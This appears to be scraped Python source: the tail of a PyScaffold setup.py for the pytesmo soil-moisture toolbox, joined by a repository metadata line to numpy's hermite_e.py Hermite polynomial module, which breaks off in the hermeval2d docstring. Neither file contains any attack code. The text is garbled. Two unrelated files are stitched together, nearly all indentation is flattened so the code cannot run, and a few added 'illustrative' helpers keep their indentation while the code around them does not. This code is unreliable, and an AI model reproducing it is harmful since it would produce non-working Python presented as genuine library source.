This file was generated with PyScaffold 1.3, a tool that easily
puts up a scaffold for your new Python project. Learn more under:
http://pyscaffold.readthedocs.org/
"""
import os
import sys
import inspect
from distutils.cmd import Command
import versioneer
import setuptools
from setuptools.command.test import test as TestCommand
from setuptools import setup
from distutils.extension import Extension
from distutils.command.build_ext import build_ext as _build_ext
import pkg_resources
class Cythonize(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
# Make sure the compiled Cython files in the distribution are
# up-to-date
from Cython.Build import cythonize
cythonize(['pytesmo/time_series/filters.pyx'])
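# Note (illustrative, not part of the original file): given the cmdclass
# registration below, this command is typically run as
# "python setup.py cythonize" to regenerate filters.c from filters.pyx
# before building the extension.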
class NumpyBuildExt(_build_ext):
def build_extensions(self):
numpy_incl = pkg_resources.resource_filename('numpy', 'core/include')
for ext in self.extensions:
            if hasattr(ext, 'include_dirs') and numpy_incl not in ext.include_dirs:
ext.include_dirs.append(numpy_incl)
_build_ext.build_extensions(self)
ext_modules = [Extension("pytesmo.time_series.filters",
["pytesmo/time_series/filters.c"], include_dirs=[]), ]
__location__ = os.path.join(os.getcwd(), os.path.dirname(
inspect.getfile(inspect.currentframe())))
# Change these settings according to your needs
MAIN_PACKAGE = "pytesmo"
DESCRIPTION = "python Toolbox for the evaluation of soil moisture observations"
LICENSE = "BSD 3 Clause"
URL = "http://rs.geo.tuwien.ac.at/validation_tool/pytesmo/"
AUTHOR = "pytesmo Developers"
EMAIL = "[email protected]"
COVERAGE_XML = False
COVERAGE_HTML = False
JUNIT_XML = False
# Add here all kinds of additional classifiers as defined under
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
CLASSIFIERS = ['Development Status :: 4 - Beta',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4']
# Add here console scripts like ['hello_world = pytesmo.module:function']
CONSOLE_SCRIPTS = []
# Versioneer configuration
versioneer.VCS = 'git'
versioneer.versionfile_source = os.path.join(MAIN_PACKAGE, '_version.py')
versioneer.versionfile_build = os.path.join(MAIN_PACKAGE, '_version.py')
versioneer.tag_prefix = 'v' # tags are like v1.2.0
versioneer.parentdir_prefix = MAIN_PACKAGE + '-'
class PyTest(TestCommand):
user_options = [("cov=", None, "Run coverage"),
("cov-xml=", None, "Generate junit xml report"),
("cov-html=", None, "Generate junit html report"),
("junitxml=", None, "Generate xml of test results")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.cov = None
self.cov_xml = False
self.cov_html = False
self.junitxml = None
def finalize_options(self):
TestCommand.finalize_options(self)
if self.cov is not None:
self.cov = ["--cov", self.cov, "--cov-report", "term-missing"]
if self.cov_xml:
self.cov.extend(["--cov-report", "xml"])
if self.cov_html:
self.cov.extend(["--cov-report", "html"])
if self.junitxml is not None:
self.junitxml = ["--junitxml", self.junitxml]
def run_tests(self):
try:
import pytest
        except ImportError:
raise RuntimeError("py.test is not installed, "
"run: pip install pytest")
params = {"args": self.test_args}
if self.cov:
params["args"] += self.cov
params["plugins"] = ["cov"]
if self.junitxml:
params["args"] += self.junitxml
errno = pytest.main(**params)
sys.exit(errno)
def sphinx_builder():
try:
from sphinx.setup_command import BuildDoc
except ImportError:
class NoSphinx(Command):
user_options = []
def initialize_options(self):
raise RuntimeError("Sphinx documentation is not installed, "
"run: pip install sphinx")
return NoSphinx
class BuildSphinxDocs(BuildDoc):
def run(self):
if self.builder == "doctest":
import sphinx.ext.doctest as doctest
# Capture the DocTestBuilder class in order to return the total
# number of failures when exiting
ref = capture_objs(doctest.DocTestBuilder)
BuildDoc.run(self)
errno = ref[-1].total_failures
sys.exit(errno)
else:
BuildDoc.run(self)
return BuildSphinxDocs
class ObjKeeper(type):
instances = {}
def __init__(cls, name, bases, dct):
cls.instances[cls] = []
def __call__(cls, *args, **kwargs):
cls.instances[cls].append(super(ObjKeeper, cls).__call__(*args,
**kwargs))
return cls.instances[cls][-1]
def capture_objs(cls):
from six import add_metaclass
module = inspect.getmodule(cls)
name = cls.__name__
keeper_class = add_metaclass(ObjKeeper)(cls)
setattr(module, name, keeper_class)
cls = getattr(module, name)
return keeper_class.instances[cls]
def get_install_requirements(path):
content = open(os.path.join(__location__, path)).read()
return [req for req in content.splitlines() if req != '']
def read(fname):
return open(os.path.join(__location__, fname)).read()
def setup_package():
# Assemble additional setup commands
cmdclass = versioneer.get_cmdclass()
cmdclass['docs'] = sphinx_builder()
cmdclass['doctest'] = sphinx_builder()
cmdclass['test'] = PyTest
cmdclass['cythonize'] = Cythonize
cmdclass['build_ext'] = NumpyBuildExt
# Some helper variables
version = versioneer.get_version()
docs_path = os.path.join(__location__, "docs")
docs_build_path = os.path.join(docs_path, "_build")
install_reqs = get_install_requirements("requirements.txt")
command_options = {
'docs': {'project': ('setup.py', MAIN_PACKAGE),
'version': ('setup.py', version.split('-', 1)[0]),
'release': ('setup.py', version),
'build_dir': ('setup.py', docs_build_path),
'config_dir': ('setup.py', docs_path),
'source_dir': ('setup.py', docs_path)},
'doctest': {'project': ('setup.py', MAIN_PACKAGE),
'version': ('setup.py', version.split('-', 1)[0]),
'release': ('setup.py', version),
'build_dir': ('setup.py', docs_build_path),
'config_dir': ('setup.py', docs_path),
'source_dir': ('setup.py', docs_path),
'builder': ('setup.py', 'doctest')},
'test': {'test_suite': ('setup.py', 'tests'),
'cov': ('setup.py', 'pytesmo')}}
if JUNIT_XML:
command_options['test']['junitxml'] = ('setup.py', 'junit.xml')
if COVERAGE_XML:
command_options['test']['cov_xml'] = ('setup.py', True)
if COVERAGE_HTML:
command_options['test']['cov_html'] = ('setup.py', True)
setup(name=MAIN_PACKAGE,
version=version,
url=URL,
description=DESCRIPTION,
author=AUTHOR,
author_email=EMAIL,
license=LICENSE,
long_description=read('README.rst'),
classifiers=CLASSIFIERS,
test_suite='tests',
packages=setuptools.find_packages(exclude=['tests', 'tests.*']),
ext_modules=ext_modules,
package_data={'pytesmo': [os.path.join('colormaps', '*.cmap')],
},
install_requires=install_reqs,
setup_requires=['six'],
cmdclass=cmdclass,
tests_require=['pytest-cov', 'pytest'],
command_options=command_options,
entry_points={'console_scripts': CONSOLE_SCRIPTS})
if __name__ == "__main__":
setup_package()
| bsd-3-clause |
dimasad/numpy | numpy/polynomial/hermite_e.py | 49 | 57120 | """
Objects for dealing with Hermite_e series.
This module provides a number of objects (mostly functions) useful for
dealing with Hermite_e series, including a `HermiteE` class that
encapsulates the usual arithmetic operations. (General information
on how this module represents and works with such polynomials is in the
docstring for its "parent" sub-package, `numpy.polynomial`).
Constants
---------
- `hermedomain` -- Hermite_e series default domain, [-1,1].
- `hermezero` -- Hermite_e series that evaluates identically to 0.
- `hermeone` -- Hermite_e series that evaluates identically to 1.
- `hermex` -- Hermite_e series for the identity map, ``f(x) = x``.
Arithmetic
----------
- `hermemulx` -- multiply a Hermite_e series in ``P_i(x)`` by ``x``.
- `hermeadd` -- add two Hermite_e series.
- `hermesub` -- subtract one Hermite_e series from another.
- `hermemul` -- multiply two Hermite_e series.
- `hermediv` -- divide one Hermite_e series by another.
- `hermeval` -- evaluate a Hermite_e series at given points.
- `hermeval2d` -- evaluate a 2D Hermite_e series at given points.
- `hermeval3d` -- evaluate a 3D Hermite_e series at given points.
- `hermegrid2d` -- evaluate a 2D Hermite_e series on a Cartesian product.
- `hermegrid3d` -- evaluate a 3D Hermite_e series on a Cartesian product.
Calculus
--------
- `hermeder` -- differentiate a Hermite_e series.
- `hermeint` -- integrate a Hermite_e series.
Misc Functions
--------------
- `hermefromroots` -- create a Hermite_e series with specified roots.
- `hermeroots` -- find the roots of a Hermite_e series.
- `hermevander` -- Vandermonde-like matrix for Hermite_e polynomials.
- `hermevander2d` -- Vandermonde-like matrix for 2D power series.
- `hermevander3d` -- Vandermonde-like matrix for 3D power series.
- `hermegauss` -- Gauss-Hermite_e quadrature, points and weights.
- `hermeweight` -- Hermite_e weight function.
- `hermecompanion` -- symmetrized companion matrix in Hermite_e form.
- `hermefit` -- least-squares fit returning a Hermite_e series.
- `hermetrim` -- trim leading coefficients from a Hermite_e series.
- `hermeline` -- Hermite_e series of given straight line.
- `herme2poly` -- convert a Hermite_e series to a polynomial.
- `poly2herme` -- convert a polynomial to a Hermite_e series.
Classes
-------
- `HermiteE` -- A Hermite_e series class.
See also
--------
`numpy.polynomial`
"""
from __future__ import division, absolute_import, print_function
import warnings
import numpy as np
import numpy.linalg as la
from . import polyutils as pu
from ._polybase import ABCPolyBase
__all__ = [
'hermezero', 'hermeone', 'hermex', 'hermedomain', 'hermeline',
'hermeadd', 'hermesub', 'hermemulx', 'hermemul', 'hermediv',
'hermepow', 'hermeval', 'hermeder', 'hermeint', 'herme2poly',
'poly2herme', 'hermefromroots', 'hermevander', 'hermefit', 'hermetrim',
'hermeroots', 'HermiteE', 'hermeval2d', 'hermeval3d', 'hermegrid2d',
'hermegrid3d', 'hermevander2d', 'hermevander3d', 'hermecompanion',
'hermegauss', 'hermeweight']
hermetrim = pu.trimcoef
def poly2herme(pol):
"""
poly2herme(pol)
Convert a polynomial to a Hermite series.
Convert an array representing the coefficients of a polynomial (relative
to the "standard" basis) ordered from lowest degree to highest, to an
array of the coefficients of the equivalent Hermite series, ordered
from lowest to highest degree.
Parameters
----------
pol : array_like
1-D array containing the polynomial coefficients
Returns
-------
c : ndarray
1-D array containing the coefficients of the equivalent Hermite
series.
See Also
--------
herme2poly
Notes
-----
The easy way to do conversions between polynomial basis sets
is to use the convert method of a class instance.
Examples
--------
>>> from numpy.polynomial.hermite_e import poly2herme
>>> poly2herme(np.arange(4))
array([ 2., 10., 2., 3.])
"""
[pol] = pu.as_series([pol])
deg = len(pol) - 1
res = 0
for i in range(deg, -1, -1):
res = hermeadd(hermemulx(res), pol[i])
return res
def herme2poly(c):
"""
Convert a Hermite series to a polynomial.
Convert an array representing the coefficients of a Hermite series,
ordered from lowest degree to highest, to an array of the coefficients
of the equivalent polynomial (relative to the "standard" basis) ordered
from lowest to highest degree.
Parameters
----------
c : array_like
1-D array containing the Hermite series coefficients, ordered
from lowest order term to highest.
Returns
-------
pol : ndarray
1-D array containing the coefficients of the equivalent polynomial
(relative to the "standard" basis) ordered from lowest order term
to highest.
See Also
--------
poly2herme
Notes
-----
The easy way to do conversions between polynomial basis sets
is to use the convert method of a class instance.
Examples
--------
>>> from numpy.polynomial.hermite_e import herme2poly
>>> herme2poly([ 2., 10., 2., 3.])
array([ 0., 1., 2., 3.])
"""
from .polynomial import polyadd, polysub, polymulx
[c] = pu.as_series([c])
n = len(c)
if n == 1:
return c
if n == 2:
return c
else:
c0 = c[-2]
c1 = c[-1]
# i is the current degree of c1
for i in range(n - 1, 1, -1):
tmp = c0
c0 = polysub(c[i - 2], c1*(i - 1))
c1 = polyadd(tmp, polymulx(c1))
return polyadd(c0, polymulx(c1))
#
# These are constant arrays of integer type so as to be compatible
# with the widest range of other types, such as Decimal.
#
# Hermite
hermedomain = np.array([-1, 1])
# Hermite coefficients representing zero.
hermezero = np.array([0])
# Hermite coefficients representing one.
hermeone = np.array([1])
# Hermite coefficients representing the identity x.
hermex = np.array([0, 1])
def hermeline(off, scl):
"""
Hermite series whose graph is a straight line.
Parameters
----------
off, scl : scalars
The specified line is given by ``off + scl*x``.
Returns
-------
y : ndarray
This module's representation of the Hermite series for
``off + scl*x``.
See Also
--------
polyline, chebline
Examples
--------
    >>> from numpy.polynomial.hermite_e import hermeline, hermeval
>>> hermeval(0,hermeline(3, 2))
3.0
>>> hermeval(1,hermeline(3, 2))
5.0
"""
if scl != 0:
return np.array([off, scl])
else:
return np.array([off])
def hermefromroots(roots):
"""
Generate a HermiteE series with given roots.
The function returns the coefficients of the polynomial
.. math:: p(x) = (x - r_0) * (x - r_1) * ... * (x - r_n),
in HermiteE form, where the `r_n` are the roots specified in `roots`.
If a zero has multiplicity n, then it must appear in `roots` n times.
For instance, if 2 is a root of multiplicity three and 3 is a root of
multiplicity 2, then `roots` looks something like [2, 2, 2, 3, 3]. The
roots can appear in any order.
If the returned coefficients are `c`, then
.. math:: p(x) = c_0 + c_1 * He_1(x) + ... + c_n * He_n(x)
The coefficient of the last term is not generally 1 for monic
polynomials in HermiteE form.
Parameters
----------
roots : array_like
Sequence containing the roots.
Returns
-------
out : ndarray
1-D array of coefficients. If all roots are real then `out` is a
real array, if some of the roots are complex, then `out` is complex
even if all the coefficients in the result are real (see Examples
below).
See Also
--------
polyfromroots, legfromroots, lagfromroots, hermfromroots,
chebfromroots.
Examples
--------
>>> from numpy.polynomial.hermite_e import hermefromroots, hermeval
>>> coef = hermefromroots((-1, 0, 1))
>>> hermeval((-1, 0, 1), coef)
array([ 0., 0., 0.])
>>> coef = hermefromroots((-1j, 1j))
>>> hermeval((-1j, 1j), coef)
array([ 0.+0.j, 0.+0.j])
"""
if len(roots) == 0:
return np.ones(1)
else:
[roots] = pu.as_series([roots], trim=False)
roots.sort()
p = [hermeline(-r, 1) for r in roots]
n = len(p)
while n > 1:
m, r = divmod(n, 2)
tmp = [hermemul(p[i], p[i+m]) for i in range(m)]
if r:
tmp[0] = hermemul(tmp[0], p[-1])
p = tmp
n = m
return p[0]
def hermeadd(c1, c2):
"""
Add one Hermite series to another.
Returns the sum of two Hermite series `c1` + `c2`. The arguments
are sequences of coefficients ordered from lowest order term to
highest, i.e., [1,2,3] represents the series ``P_0 + 2*P_1 + 3*P_2``.
Parameters
----------
c1, c2 : array_like
1-D arrays of Hermite series coefficients ordered from low to
high.
Returns
-------
out : ndarray
Array representing the Hermite series of their sum.
See Also
--------
hermesub, hermemul, hermediv, hermepow
Notes
-----
Unlike multiplication, division, etc., the sum of two Hermite series
is a Hermite series (without having to "reproject" the result onto
the basis set) so addition, just like that of "standard" polynomials,
is simply "component-wise."
Examples
--------
>>> from numpy.polynomial.hermite_e import hermeadd
>>> hermeadd([1, 2, 3], [1, 2, 3, 4])
array([ 2., 4., 6., 4.])
"""
# c1, c2 are trimmed copies
[c1, c2] = pu.as_series([c1, c2])
if len(c1) > len(c2):
c1[:c2.size] += c2
ret = c1
else:
c2[:c1.size] += c1
ret = c2
return pu.trimseq(ret)
def hermesub(c1, c2):
"""
Subtract one Hermite series from another.
Returns the difference of two Hermite series `c1` - `c2`. The
sequences of coefficients are from lowest order term to highest, i.e.,
[1,2,3] represents the series ``P_0 + 2*P_1 + 3*P_2``.
Parameters
----------
c1, c2 : array_like
1-D arrays of Hermite series coefficients ordered from low to
high.
Returns
-------
out : ndarray
Of Hermite series coefficients representing their difference.
See Also
--------
hermeadd, hermemul, hermediv, hermepow
Notes
-----
Unlike multiplication, division, etc., the difference of two Hermite
series is a Hermite series (without having to "reproject" the result
onto the basis set) so subtraction, just like that of "standard"
polynomials, is simply "component-wise."
Examples
--------
>>> from numpy.polynomial.hermite_e import hermesub
>>> hermesub([1, 2, 3, 4], [1, 2, 3])
array([ 0., 0., 0., 4.])
"""
# c1, c2 are trimmed copies
[c1, c2] = pu.as_series([c1, c2])
if len(c1) > len(c2):
c1[:c2.size] -= c2
ret = c1
else:
c2 = -c2
c2[:c1.size] += c1
ret = c2
return pu.trimseq(ret)
def hermemulx(c):
"""Multiply a Hermite series by x.
Multiply the Hermite series `c` by x, where x is the independent
variable.
Parameters
----------
c : array_like
1-D array of Hermite series coefficients ordered from low to
high.
Returns
-------
out : ndarray
Array representing the result of the multiplication.
Notes
-----
The multiplication uses the recursion relationship for Hermite
polynomials in the form
.. math::
        xP_i(x) = (P_{i + 1}(x) + iP_{i - 1}(x))
Examples
--------
>>> from numpy.polynomial.hermite_e import hermemulx
>>> hermemulx([1, 2, 3])
array([ 2., 7., 2., 3.])
"""
# c is a trimmed copy
[c] = pu.as_series([c])
# The zero series needs special treatment
if len(c) == 1 and c[0] == 0:
return c
prd = np.empty(len(c) + 1, dtype=c.dtype)
prd[0] = c[0]*0
prd[1] = c[0]
for i in range(1, len(c)):
prd[i + 1] = c[i]
prd[i - 1] += c[i]*i
return prd
def hermemul(c1, c2):
"""
Multiply one Hermite series by another.
Returns the product of two Hermite series `c1` * `c2`. The arguments
are sequences of coefficients, from lowest order "term" to highest,
e.g., [1,2,3] represents the series ``P_0 + 2*P_1 + 3*P_2``.
Parameters
----------
c1, c2 : array_like
1-D arrays of Hermite series coefficients ordered from low to
high.
Returns
-------
out : ndarray
Of Hermite series coefficients representing their product.
See Also
--------
hermeadd, hermesub, hermediv, hermepow
Notes
-----
In general, the (polynomial) product of two C-series results in terms
that are not in the Hermite polynomial basis set. Thus, to express
the product as a Hermite series, it is necessary to "reproject" the
product onto said basis set, which may produce "unintuitive" (but
correct) results; see Examples section below.
Examples
--------
>>> from numpy.polynomial.hermite_e import hermemul
>>> hermemul([1, 2, 3], [0, 1, 2])
array([ 14., 15., 28., 7., 6.])
"""
# s1, s2 are trimmed copies
[c1, c2] = pu.as_series([c1, c2])
if len(c1) > len(c2):
c = c2
xs = c1
else:
c = c1
xs = c2
if len(c) == 1:
c0 = c[0]*xs
c1 = 0
elif len(c) == 2:
c0 = c[0]*xs
c1 = c[1]*xs
else:
nd = len(c)
c0 = c[-2]*xs
c1 = c[-1]*xs
for i in range(3, len(c) + 1):
tmp = c0
nd = nd - 1
c0 = hermesub(c[-i]*xs, c1*(nd - 1))
c1 = hermeadd(tmp, hermemulx(c1))
return hermeadd(c0, hermemulx(c1))
def hermediv(c1, c2):
"""
Divide one Hermite series by another.
Returns the quotient-with-remainder of two Hermite series
`c1` / `c2`. The arguments are sequences of coefficients from lowest
order "term" to highest, e.g., [1,2,3] represents the series
``P_0 + 2*P_1 + 3*P_2``.
Parameters
----------
c1, c2 : array_like
1-D arrays of Hermite series coefficients ordered from low to
high.
Returns
-------
[quo, rem] : ndarrays
Of Hermite series coefficients representing the quotient and
remainder.
See Also
--------
hermeadd, hermesub, hermemul, hermepow
Notes
-----
In general, the (polynomial) division of one Hermite series by another
results in quotient and remainder terms that are not in the Hermite
polynomial basis set. Thus, to express these results as a Hermite
series, it is necessary to "reproject" the results onto the Hermite
basis set, which may produce "unintuitive" (but correct) results; see
Examples section below.
Examples
--------
>>> from numpy.polynomial.hermite_e import hermediv
>>> hermediv([ 14., 15., 28., 7., 6.], [0, 1, 2])
(array([ 1., 2., 3.]), array([ 0.]))
>>> hermediv([ 15., 17., 28., 7., 6.], [0, 1, 2])
(array([ 1., 2., 3.]), array([ 1., 2.]))
"""
# c1, c2 are trimmed copies
[c1, c2] = pu.as_series([c1, c2])
if c2[-1] == 0:
raise ZeroDivisionError()
lc1 = len(c1)
lc2 = len(c2)
if lc1 < lc2:
return c1[:1]*0, c1
elif lc2 == 1:
return c1/c2[-1], c1[:1]*0
else:
quo = np.empty(lc1 - lc2 + 1, dtype=c1.dtype)
rem = c1
for i in range(lc1 - lc2, - 1, -1):
p = hermemul([0]*i + [1], c2)
q = rem[-1]/p[-1]
rem = rem[:-1] - q*p[:-1]
quo[i] = q
return quo, pu.trimseq(rem)
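def _check_hermediv_identity():
    # Illustrative helper, not called anywhere in this module: the quotient
    # and remainder returned by hermediv satisfy c1 == quo*c2 + rem as
    # HermiteE series, checked here for the first docstring example.
    c1 = [14., 15., 28., 7., 6.]
    c2 = [0., 1., 2.]
    quo, rem = hermediv(c1, c2)
    return np.allclose(hermeadd(hermemul(quo, c2), rem), c1)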
def hermepow(c, pow, maxpower=16):
"""Raise a Hermite series to a power.
Returns the Hermite series `c` raised to the power `pow`. The
argument `c` is a sequence of coefficients ordered from low to high.
i.e., [1,2,3] is the series ``P_0 + 2*P_1 + 3*P_2.``
Parameters
----------
c : array_like
1-D array of Hermite series coefficients ordered from low to
high.
pow : integer
Power to which the series will be raised
maxpower : integer, optional
Maximum power allowed. This is mainly to limit growth of the series
to unmanageable size. Default is 16
Returns
-------
coef : ndarray
Hermite series of power.
See Also
--------
hermeadd, hermesub, hermemul, hermediv
Examples
--------
>>> from numpy.polynomial.hermite_e import hermepow
>>> hermepow([1, 2, 3], 2)
array([ 23., 28., 46., 12., 9.])
"""
# c is a trimmed copy
[c] = pu.as_series([c])
power = int(pow)
if power != pow or power < 0:
raise ValueError("Power must be a non-negative integer.")
elif maxpower is not None and power > maxpower:
raise ValueError("Power is too large")
elif power == 0:
return np.array([1], dtype=c.dtype)
elif power == 1:
return c
else:
# This can be made more efficient by using powers of two
# in the usual way.
prd = c
for i in range(2, power + 1):
prd = hermemul(prd, c)
return prd
def hermeder(c, m=1, scl=1, axis=0):
"""
Differentiate a Hermite_e series.
Returns the series coefficients `c` differentiated `m` times along
`axis`. At each iteration the result is multiplied by `scl` (the
scaling factor is for use in a linear change of variable). The argument
`c` is an array of coefficients from low to high degree along each
axis, e.g., [1,2,3] represents the series ``1*He_0 + 2*He_1 + 3*He_2``
while [[1,2],[1,2]] represents ``1*He_0(x)*He_0(y) + 1*He_1(x)*He_0(y)
+ 2*He_0(x)*He_1(y) + 2*He_1(x)*He_1(y)`` if axis=0 is ``x`` and axis=1
is ``y``.
Parameters
----------
c : array_like
Array of Hermite_e series coefficients. If `c` is multidimensional
the different axis correspond to different variables with the
degree in each axis given by the corresponding index.
m : int, optional
Number of derivatives taken, must be non-negative. (Default: 1)
scl : scalar, optional
Each differentiation is multiplied by `scl`. The end result is
multiplication by ``scl**m``. This is for use in a linear change of
variable. (Default: 1)
axis : int, optional
Axis over which the derivative is taken. (Default: 0).
.. versionadded:: 1.7.0
Returns
-------
der : ndarray
Hermite series of the derivative.
See Also
--------
hermeint
Notes
-----
In general, the result of differentiating a Hermite series does not
resemble the same operation on a power series. Thus the result of this
function may be "unintuitive," albeit correct; see Examples section
below.
Examples
--------
>>> from numpy.polynomial.hermite_e import hermeder
>>> hermeder([ 1., 1., 1., 1.])
array([ 1., 2., 3.])
>>> hermeder([-0.25, 1., 1./2., 1./3., 1./4 ], m=2)
array([ 1., 2., 3.])
"""
c = np.array(c, ndmin=1, copy=1)
if c.dtype.char in '?bBhHiIlLqQpP':
c = c.astype(np.double)
cnt, iaxis = [int(t) for t in [m, axis]]
if cnt != m:
raise ValueError("The order of derivation must be integer")
if cnt < 0:
raise ValueError("The order of derivation must be non-negative")
if iaxis != axis:
raise ValueError("The axis must be integer")
if not -c.ndim <= iaxis < c.ndim:
raise ValueError("The axis is out of range")
if iaxis < 0:
iaxis += c.ndim
if cnt == 0:
return c
c = np.rollaxis(c, iaxis)
n = len(c)
if cnt >= n:
return c[:1]*0
else:
for i in range(cnt):
n = n - 1
c *= scl
der = np.empty((n,) + c.shape[1:], dtype=c.dtype)
for j in range(n, 0, -1):
der[j - 1] = j*c[j]
c = der
c = np.rollaxis(c, 0, iaxis + 1)
return c
def hermeint(c, m=1, k=[], lbnd=0, scl=1, axis=0):
"""
Integrate a Hermite_e series.
Returns the Hermite_e series coefficients `c` integrated `m` times from
`lbnd` along `axis`. At each iteration the resulting series is
**multiplied** by `scl` and an integration constant, `k`, is added.
The scaling factor is for use in a linear change of variable. ("Buyer
beware": note that, depending on what one is doing, one may want `scl`
to be the reciprocal of what one might expect; for more information,
see the Notes section below.) The argument `c` is an array of
coefficients from low to high degree along each axis, e.g., [1,2,3]
    represents the series ``He_0 + 2*He_1 + 3*He_2`` while [[1,2],[1,2]]
    represents ``1*He_0(x)*He_0(y) + 1*He_1(x)*He_0(y) + 2*He_0(x)*He_1(y) +
    2*He_1(x)*He_1(y)`` if axis=0 is ``x`` and axis=1 is ``y``.
Parameters
----------
c : array_like
Array of Hermite_e series coefficients. If c is multidimensional
the different axis correspond to different variables with the
degree in each axis given by the corresponding index.
m : int, optional
Order of integration, must be positive. (Default: 1)
k : {[], list, scalar}, optional
Integration constant(s). The value of the first integral at
``lbnd`` is the first value in the list, the value of the second
integral at ``lbnd`` is the second value, etc. If ``k == []`` (the
default), all constants are set to zero. If ``m == 1``, a single
scalar can be given instead of a list.
lbnd : scalar, optional
The lower bound of the integral. (Default: 0)
scl : scalar, optional
Following each integration the result is *multiplied* by `scl`
before the integration constant is added. (Default: 1)
axis : int, optional
Axis over which the integral is taken. (Default: 0).
.. versionadded:: 1.7.0
Returns
-------
S : ndarray
Hermite_e series coefficients of the integral.
Raises
------
ValueError
If ``m < 0``, ``len(k) > m``, ``np.isscalar(lbnd) == False``, or
``np.isscalar(scl) == False``.
See Also
--------
hermeder
Notes
-----
Note that the result of each integration is *multiplied* by `scl`.
Why is this important to note? Say one is making a linear change of
variable :math:`u = ax + b` in an integral relative to `x`. Then
.. math::`dx = du/a`, so one will need to set `scl` equal to
:math:`1/a` - perhaps not what one would have first thought.
Also note that, in general, the result of integrating a C-series needs
to be "reprojected" onto the C-series basis set. Thus, typically,
the result of this function is "unintuitive," albeit correct; see
Examples section below.
Examples
--------
>>> from numpy.polynomial.hermite_e import hermeint
>>> hermeint([1, 2, 3]) # integrate once, value 0 at 0.
array([ 1., 1., 1., 1.])
>>> hermeint([1, 2, 3], m=2) # integrate twice, value & deriv 0 at 0
array([-0.25 , 1. , 0.5 , 0.33333333, 0.25 ])
>>> hermeint([1, 2, 3], k=1) # integrate once, value 1 at 0.
array([ 2., 1., 1., 1.])
>>> hermeint([1, 2, 3], lbnd=-1) # integrate once, value 0 at -1
array([-1., 1., 1., 1.])
>>> hermeint([1, 2, 3], m=2, k=[1, 2], lbnd=-1)
array([ 1.83333333, 0. , 0.5 , 0.33333333, 0.25 ])
"""
c = np.array(c, ndmin=1, copy=1)
if c.dtype.char in '?bBhHiIlLqQpP':
c = c.astype(np.double)
if not np.iterable(k):
k = [k]
cnt, iaxis = [int(t) for t in [m, axis]]
if cnt != m:
raise ValueError("The order of integration must be integer")
if cnt < 0:
raise ValueError("The order of integration must be non-negative")
if len(k) > cnt:
raise ValueError("Too many integration constants")
if iaxis != axis:
raise ValueError("The axis must be integer")
if not -c.ndim <= iaxis < c.ndim:
raise ValueError("The axis is out of range")
if iaxis < 0:
iaxis += c.ndim
if cnt == 0:
return c
c = np.rollaxis(c, iaxis)
k = list(k) + [0]*(cnt - len(k))
for i in range(cnt):
n = len(c)
c *= scl
if n == 1 and np.all(c[0] == 0):
c[0] += k[i]
else:
tmp = np.empty((n + 1,) + c.shape[1:], dtype=c.dtype)
tmp[0] = c[0]*0
tmp[1] = c[0]
for j in range(1, n):
tmp[j + 1] = c[j]/(j + 1)
tmp[0] += k[i] - hermeval(lbnd, tmp)
c = tmp
c = np.rollaxis(c, 0, iaxis + 1)
return c
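def _check_hermeint_hermeder_inverse():
    # Illustrative helper, not called anywhere in this module: with the
    # default constants and scaling, differentiating an m-fold integral
    # recovers the original coefficients.
    c = np.array([1., 2., 3.])
    return np.allclose(hermeder(hermeint(c, m=2), m=2), c)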
def hermeval(x, c, tensor=True):
"""
Evaluate an HermiteE series at points x.
If `c` is of length `n + 1`, this function returns the value:
.. math:: p(x) = c_0 * He_0(x) + c_1 * He_1(x) + ... + c_n * He_n(x)
The parameter `x` is converted to an array only if it is a tuple or a
list, otherwise it is treated as a scalar. In either case, either `x`
or its elements must support multiplication and addition both with
themselves and with the elements of `c`.
If `c` is a 1-D array, then `p(x)` will have the same shape as `x`. If
`c` is multidimensional, then the shape of the result depends on the
value of `tensor`. If `tensor` is true the shape will be c.shape[1:] +
x.shape. If `tensor` is false the shape will be c.shape[1:]. Note that
    scalars have shape ().
Trailing zeros in the coefficients will be used in the evaluation, so
they should be avoided if efficiency is a concern.
Parameters
----------
x : array_like, compatible object
If `x` is a list or tuple, it is converted to an ndarray, otherwise
it is left unchanged and treated as a scalar. In either case, `x`
        or its elements must support addition and multiplication with
        themselves and with the elements of `c`.
c : array_like
Array of coefficients ordered so that the coefficients for terms of
degree n are contained in c[n]. If `c` is multidimensional the
remaining indices enumerate multiple polynomials. In the two
dimensional case the coefficients may be thought of as stored in
the columns of `c`.
tensor : boolean, optional
If True, the shape of the coefficient array is extended with ones
on the right, one for each dimension of `x`. Scalars have dimension 0
for this action. The result is that every column of coefficients in
`c` is evaluated for every element of `x`. If False, `x` is broadcast
over the columns of `c` for the evaluation. This keyword is useful
when `c` is multidimensional. The default value is True.
.. versionadded:: 1.7.0
Returns
-------
values : ndarray, algebra_like
The shape of the return value is described above.
See Also
--------
hermeval2d, hermegrid2d, hermeval3d, hermegrid3d
Notes
-----
The evaluation uses Clenshaw recursion, aka synthetic division.
Examples
--------
>>> from numpy.polynomial.hermite_e import hermeval
>>> coef = [1,2,3]
>>> hermeval(1, coef)
3.0
>>> hermeval([[1,2],[3,4]], coef)
array([[ 3., 14.],
[ 31., 54.]])
"""
c = np.array(c, ndmin=1, copy=0)
if c.dtype.char in '?bBhHiIlLqQpP':
c = c.astype(np.double)
if isinstance(x, (tuple, list)):
x = np.asarray(x)
if isinstance(x, np.ndarray) and tensor:
c = c.reshape(c.shape + (1,)*x.ndim)
if len(c) == 1:
c0 = c[0]
c1 = 0
elif len(c) == 2:
c0 = c[0]
c1 = c[1]
else:
nd = len(c)
c0 = c[-2]
c1 = c[-1]
for i in range(3, len(c) + 1):
tmp = c0
nd = nd - 1
c0 = c[-i] - c1*(nd - 1)
c1 = tmp + c1*x
return c0 + c1*x
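def _check_hermeval_against_recurrence():
    # Illustrative helper, not called anywhere in this module: summing basis
    # polynomials built from the three-term recurrence
    # He_{k+1}(x) = x*He_k(x) - k*He_{k-1}(x) should agree with the
    # Clenshaw-based evaluation above.
    x, c = 0.5, [1., 2., 3., 4.]
    he_km1, he_k = 1.0, x
    total = c[0]*he_km1 + c[1]*he_k
    for k in range(1, len(c) - 1):
        he_km1, he_k = he_k, x*he_k - k*he_km1
        total += c[k + 1]*he_k
    return np.allclose(total, hermeval(x, c))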
def hermeval2d(x, y, c):
"""
Evaluate a 2-D HermiteE series at points (x, y).
This function returns the values:
.. math:: p(x,y) = \\sum_{i,j} c_{i,j} * He_i(x) * He_j(y)
